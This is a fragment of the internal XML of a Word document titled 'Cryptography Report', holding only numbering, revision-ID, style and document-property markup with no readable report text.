    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14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5C0"/>
    <w:rsid w:val="00010E93"/>
    <w:rsid w:val="00054B00"/>
    <w:rsid w:val="00076EBD"/>
    <w:rsid w:val="00107556"/>
    <w:rsid w:val="00126FA9"/>
    <w:rsid w:val="001335FB"/>
    <w:rsid w:val="00164A06"/>
    <w:rsid w:val="00176E46"/>
    <w:rsid w:val="001A688C"/>
    <w:rsid w:val="001F2A2D"/>
    <w:rsid w:val="00251246"/>
    <w:rsid w:val="00262768"/>
    <w:rsid w:val="00267E0D"/>
    <w:rsid w:val="002A0F5D"/>
    <w:rsid w:val="002B5CEF"/>
    <w:rsid w:val="002D2700"/>
    <w:rsid w:val="00334828"/>
    <w:rsid w:val="00364141"/>
    <w:rsid w:val="00375C17"/>
    <w:rsid w:val="003762E5"/>
    <w:rsid w:val="003860D2"/>
    <w:rsid w:val="003A35C0"/>
    <w:rsid w:val="003A5524"/>
    <w:rsid w:val="003B3677"/>
    <w:rsid w:val="003B4497"/>
    <w:rsid w:val="003D3C5B"/>
    <w:rsid w:val="00405F4F"/>
    <w:rsid w:val="00407014"/>
    <w:rsid w:val="00407978"/>
    <w:rsid w:val="00410737"/>
    <w:rsid w:val="00474E91"/>
    <w:rsid w:val="004918AD"/>
    <w:rsid w:val="00516947"/>
    <w:rsid w:val="00585B20"/>
    <w:rsid w:val="00594DBE"/>
    <w:rsid w:val="005B5BC9"/>
    <w:rsid w:val="005E4446"/>
    <w:rsid w:val="00625745"/>
    <w:rsid w:val="00665137"/>
    <w:rsid w:val="006D5622"/>
    <w:rsid w:val="006E5699"/>
    <w:rsid w:val="00716EC2"/>
    <w:rsid w:val="00717FB5"/>
    <w:rsid w:val="00755670"/>
    <w:rsid w:val="0080024E"/>
    <w:rsid w:val="00810030"/>
    <w:rsid w:val="008654D3"/>
    <w:rsid w:val="0088069C"/>
    <w:rsid w:val="008A05CE"/>
    <w:rsid w:val="00905793"/>
    <w:rsid w:val="00957CB9"/>
    <w:rsid w:val="009950FF"/>
    <w:rsid w:val="00A12C05"/>
    <w:rsid w:val="00A2442F"/>
    <w:rsid w:val="00A82107"/>
    <w:rsid w:val="00AB7810"/>
    <w:rsid w:val="00AC58DF"/>
    <w:rsid w:val="00AE7221"/>
    <w:rsid w:val="00B82381"/>
    <w:rsid w:val="00B91DAB"/>
    <w:rsid w:val="00BF64F4"/>
    <w:rsid w:val="00C028D4"/>
    <w:rsid w:val="00CC7F4F"/>
    <w:rsid w:val="00CD13DC"/>
    <w:rsid w:val="00D2580E"/>
    <w:rsid w:val="00D8645D"/>
    <w:rsid w:val="00DB0AF8"/>
    <w:rsid w:val="00DC533D"/>
    <w:rsid w:val="00E9647C"/>
    <w:rsid w:val="00EA08FA"/>
    <w:rsid w:val="00EA491B"/>
    <w:rsid w:val="00F307A2"/>
    <w:rsid w:val="00F3746F"/>
    <w:rsid w:val="00F67CD3"/>
    <w:rsid w:val="00F8005F"/>
    <w:rsid w:val="00FB25DA"/>
    <w:rsid w:val="00FF089D"/>
    <w:rsid w:val="00FF1BC8"/>
    <w:rsid w:val="00FF2D17"/>
    <w:rsid w:val="00F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B0C4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E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EBD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0007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EBD"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E44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446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BF64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64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C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0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E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EBD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0007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EBD"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E44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446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BF64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64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C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0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Cryptography Report</vt:lpstr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Cryptography Report</dc:title>
  <dc:subject/>
  <dc:creator>Yousuf</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>glab</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-26T09:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-28T05:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>